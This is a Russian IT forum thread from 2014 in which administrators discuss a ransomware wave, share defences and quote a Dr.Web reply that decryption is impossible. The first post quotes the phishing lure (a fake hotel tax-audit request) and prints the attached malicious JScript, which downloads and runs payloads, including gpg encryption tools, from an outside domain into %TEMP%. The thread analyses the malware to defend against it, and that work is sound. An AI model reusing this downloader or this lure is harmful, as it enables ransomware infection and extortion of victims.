Автор Тема: Новая волна шифровальщиков  (Прочитано 4530 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн mksap

  • Авторитет
  • Пол: Мужской
Новая волна шифровальщиков
« : 06 Июня 2014, 14:39:06 »
Столкнулся в первый раз. Принесли ПК с зашифрованными данными в основном файлы форматов: .doc, .xls, .zip и .jpg. В интернете много оказалось про это написано, но предстоящие танцы с бубном не впечатляют.

Вот пример одна из статей: http://chewriter.ru/v-internete/virus-zashifroval-vse-fajly-doc-jpg-vernee-py-talsya-zashifro.html

Вот текст электронного письма:

В нашем гостиничном комплексе с 12.06.2014 года будет проходить налоговая проверка.

С целью подготовки мы систематизируем нашу документацию.
Некоторые оригиналы документов нам найти не удалось.
Ознакомьтесь со списком (во вложении) и дайте обратную связь. Возможно, у Вас есть оригиналы указанной документации, относящейся к нашему сотрудничеству?

Если необходимо, мы оплатим все траты по доставке документов.

С уважением, администрация гостиничного комплекса "Арт сити".
347360, Ростовская область, г. Волгодонск, ул. Ленина, 52а
Тел.: +7 (438) 798-14-40 22-49-16

Во вложении архив, в архиве файл с длинным именем, как раз чтобы не увидеть расширение и его принадлежность к ява скрипту.
при просмотре скрипт выглядит так:

function CreateObject(a){return new ActiveXObject(a)}function DWNDCRYPTO(a,b){b=WshShell.ExpandEnvironmentStrings(b);var c=WScript.CreateObject("Msxml2.XMLhttp");c.open("GET",a,!1);c.send(null);var d=CreateObject("ADODB.Stream");with(d)return Mode=3,Type=1,Open(),Write(c.responseBody),SaveToFile(b,1),Close(),b}function Run(a){WshShell.Run(a,0,0)}var DestinationFLE="%TEMP%\\",WshShell=CreateObject("WScript.Shell"),FSO=fso=CreateObject("Scripting.FileSystemObject");
DWNDCRYPTO("http://nblock.tk/document","%TEMP%\\document.doc");try{Run('"'+DestinationFLE+'document.doc"')}catch(e$$12){}DWNDCRYPTO("http://nblock.tk/cde","%TEMP%\\cde.cmd");DWNDCRYPTO("http://nblock.tk/svchost","%TEMP%\\svchost.cry");DWNDCRYPTO("http://nblock.tk/iconv","%TEMP%\\iconv.dll");DWNDCRYPTO("http://nblock.tk/genkey","%TEMP%\\genkey.cry");DWNDCRYPTO("http://nblock.tk/sdelete","%TEMP%\\sdelete.cry");DWNDCRYPTO("http://nblock.tk/secrypt","%TEMP%\\secrypt.cry");
DWNDCRYPTO("http://nblock.tk/uncrypt","%TEMP%\\uncrypt.cry");Run('"'+DestinationFLE+'cde.cmd"');DWNDCRYPTO("http://nblock.tk/DECRYPT","%TEMP%\\DECRYPT.zip");DWNDCRYPTO("http://nblock.tk/mlai","%TEMP%\\mlai.js");DWNDCRYPTO("http://nblock.tk/mlai1","%TEMP%\\mlai1.js");

Вот пока все, что удалось выяснить. Ищу лицензионный ключ на Dr.Web, хочу отправить зашифрованные файлы в контору. Может кто ещё сталкивался?
Миша, а почему ты такой добрый и спокойный?
- Все просто! Я по воскресеньям в людей стреляю!

Оффлайн mikle.gusev

  • Редкий гость
Re: Новая волна шифровальщиков
« Ответ #1 : 09 Июня 2014, 02:08:44 »
Встречал, к сожалению и именно с таким текстом письма. Расшифровка без ключа невозможна, а он у якобы "ваших друзей"  (см. файл в корне диска С: с инструкцией по оплате консультации и собственно ключа, это не разводка действительно присылают ключ стоит примерно 130 евро на одну машину).
Механизм похоже такой - исполняется присланный JS. Он скачивает несколько файлов для своей гнусной работы ну и инструкцию. Затем запускается и шифрует xls,doc,zip,7z,rar,jpg может и еще что то. Меня настораживает что он скачивает svchost и mlai.js - возможно для того чтобы себя размножать. Судя по наличию файла genkey - ключ шифратора генерится на месте и он уникален, что позволяет поганцам избежать обмена ключами между пострадавшими и все же купившими у них ключ дешифратора. У меня три машины пострадали от одного и того же письма - ключи шифрования разные. ДРВЕБ не поможет расшифровать, но в базу он уже добавил сигнатуру и скритп блокируется с названием JS.Downloader.263

Оффлайн Francyz

  • Мастер
  • Пол: Мужской
  • Сижу... примус починяю.
Re: Новая волна шифровальщиков
« Ответ #2 : 09 Июня 2014, 11:37:08 »
С аналогичным письмом сталкивался знакомый и тоже от этой же компании. Они с ними работали и им пришла рассылка. Но ему повезло, поскольку прав админа на тачках не было и в данном случае это спасло потому что скрипт не выполнялся. Но ходят слухи, что иногда и это не спасает. Когда они позвонили в компанию, то там подтвердили, что их почта была взломана. Юристы в данном случае советуют подать в суд на эту фирму за причинение вреда.

Похожая ситуация http://habrahabr.ru/post/168677/
« Последнее редактирование: 09 Июня 2014, 11:52:20 от Francyz »
FW6RMCQ - скидка в 5 евро на комплектующие в немецком интернет-магазине computeruniverse
Сервис доставки с США (Amazon, Ebay и т.д.) - Бандеролька - Купон в 7$ при регистрации

Оффлайн point212

  • Модераторы
  • *****
  • Пол: Мужской
  • Мосс смотрит на вас...
Re: Новая волна шифровальщиков
« Ответ #3 : 09 Июня 2014, 12:51:16 »
Пичально. Что делать то? Принудительно запрещать выполнение сценариев на JavaScript?
Вообще отбирать у машин возможность работать в интернете, вводить параноидальные меры безопасности, запрещать сетевые шары, отключать USB?
Или может настроить Volume Shadow Copy чтобы можно было откатиться на более раннюю редакцию документа?

Мне прям хочется теперь пересадить всех в терминалку, чтобы если что просто откатить snapshot диска на предыдущий день и все продолжили работать.

Оффлайн Serega

  • Волшебник
  • Пол: Мужской
Re: Новая волна шифровальщиков
« Ответ #4 : 09 Июня 2014, 17:44:27 »
То ли еще будет!




На Android появился вирус-блокировщик
http://www.iguides.ru/main/gadgets/google/na_android_poyavilsya_virus_blokirovshchik/

Оффлайн mksap

  • Авторитет
  • Пол: Мужской
Re: Новая волна шифровальщиков
« Ответ #5 : 10 Июня 2014, 09:23:01 »
Пичально. Что делать то? Принудительно запрещать выполнение сценариев на JavaScript?
Вообще отбирать у машин возможность работать в интернете, вводить параноидальные меры безопасности, запрещать сетевые шары, отключать USB?
Или может настроить Volume Shadow Copy чтобы можно было откатиться на более раннюю редакцию документа?

Мне прям хочется теперь пересадить всех в терминалку, чтобы если что просто откатить snapshot диска на предыдущий день и все продолжили работать.

Если возможность есть наверное стоит, печально обстоят дела там где этого не сделать.
Миша, а почему ты такой добрый и спокойный?
- Все просто! Я по воскресеньям в людей стреляю!

Оффлайн point212

  • Модераторы
  • *****
  • Пол: Мужской
  • Мосс смотрит на вас...
Re: Новая волна шифровальщиков
« Ответ #6 : 10 Июня 2014, 15:19:38 »
Да возможность скорее теоретическая. Слишком дохрена преобразований.
Хорошо тем у кого вся инфраструктура заточена на терминальный доступ.

Оффлайн Film

  • Постоянный читатель
  • Пол: Мужской
Re: Новая волна шифровальщиков
« Ответ #7 : 10 Июня 2014, 19:29:19 »
Сказал бы я вам всем пользователям Windows .... но ладно... так вам и надо.
Захожу сюда редко.

Оффлайн point212

  • Модераторы
  • *****
  • Пол: Мужской
  • Мосс смотрит на вас...
Re: Новая волна шифровальщиков
« Ответ #8 : 10 Июня 2014, 20:41:32 »
А вы openssl на всех своих Линухах уже проапгрейдили чтобы закрыть Heartbleed? :))))
Линух, винух... разницы никакой. Главное инфраструктура... а геммороя можно и там и там хлебнуть.

Оффлайн Film

  • Постоянный читатель
  • Пол: Мужской
Re: Новая волна шифровальщиков
« Ответ #9 : 10 Июня 2014, 21:20:58 »
А вы openssl на всех своих Линухах уже проапгрейдили чтобы закрыть Heartbleed? :))))
Линух, винух... разницы никакой. Главное инфраструктура... а геммороя можно и там и там хлебнуть.

Я даже не знаю, что такое openssl и Heartbleed, у меня Линукс просто работает и все. И геморроя с ним никогда не было.
Захожу сюда редко.

Оффлайн point212

  • Модераторы
  • *****
  • Пол: Мужской
  • Мосс смотрит на вас...
Re: Новая волна шифровальщиков
« Ответ #10 : 10 Июня 2014, 22:52:43 »
Видать я как-то не так его готовлю :)))

Оффлайн Film

  • Постоянный читатель
  • Пол: Мужской
Re: Новая волна шифровальщиков
« Ответ #11 : 10 Июня 2014, 23:10:06 »
Видать я как-то не так его готовлю :)))

Скорее всего ты им активно не пользуешься, а о его проблемах узнаешь из "правдивых" публикаций в интернете. )))
Захожу сюда редко.

Оффлайн itvdonsk

  • Волшебник
  • Пол: Мужской
    • itvdonsk
Re: Новая волна шифровальщиков
« Ответ #12 : 11 Июня 2014, 00:14:43 »
Видать я как-то не так его готовлю :)))

Скорее всего ты им активно не пользуешься, а о его проблемах узнаешь из "правдивых" публикаций в интернете. )))

А причем тут ваще линукс?
Крутизна программера — не в синтаксисе исходников, а в толщине его кошелька
Telegram Group

Оффлайн point212

  • Модераторы
  • *****
  • Пол: Мужской
  • Мосс смотрит на вас...
Re: Новая волна шифровальщиков
« Ответ #13 : 11 Июня 2014, 01:05:36 »
Видать я как-то не так его готовлю :)))

Скорее всего ты им активно не пользуешься, а о его проблемах узнаешь из "правдивых" публикаций в интернете. )))
Не угадал :) Иначе с чего бы я стал писать. Я как раз таки активно пользуюсь. На десктопе щас не стоит, но серваков под линухом под опекой небольшая горстка есть.
Я это к тому, что и под Линух вирусы есть. Причем уже довольно много. А самое главное, что всерьез никто централизованно безопасностью экосистемы не занимается. в отличие от.... остается уповать на дистростроителей, и их дальновидность. Многие, интересно, живут со включенным SELinux и с настроенным файрволлом? :) А под вновьустановленный софт правила SELinux'а пишите? Что-нибудь типа tripwire стоит? Отчёты на мыло читаем, логи регулярно просматриваем? Я думаю ан большую часть этих вопросов ответ - нет. А безопасность линуха как раз и строится из этих кирпичиков, а не на том что он "непробиваем".

Оффлайн mksap

  • Авторитет
  • Пол: Мужской
Re: Новая волна шифровальщиков
« Ответ #14 : 11 Июня 2014, 14:16:45 »
Цитировать
Приложенные копии файла KEY.PRIVATE также зашифрованы и поэтому невозможно изъять информацию, которая могла бы содействовать в поиске решения для расшифровки.

Ответ из нашей вирусной лаборатории сводится к тому, что шансов на появление расшифровки практически нет.
Шифрование произошло средствами gpg, в каждом случае применялся уникальный пароль (подобрать или вычислить который современными техническими средствами за разумное время невозможно).
Если мы получим полезную информацию по этому случаю шифрования, мы оповестим Вас в этом запросе.

С уважением, Евгений Титов
служба технической поддержки компании "Доктор Веб".

Как-то так....
Миша, а почему ты такой добрый и спокойный?
- Все просто! Я по воскресеньям в людей стреляю!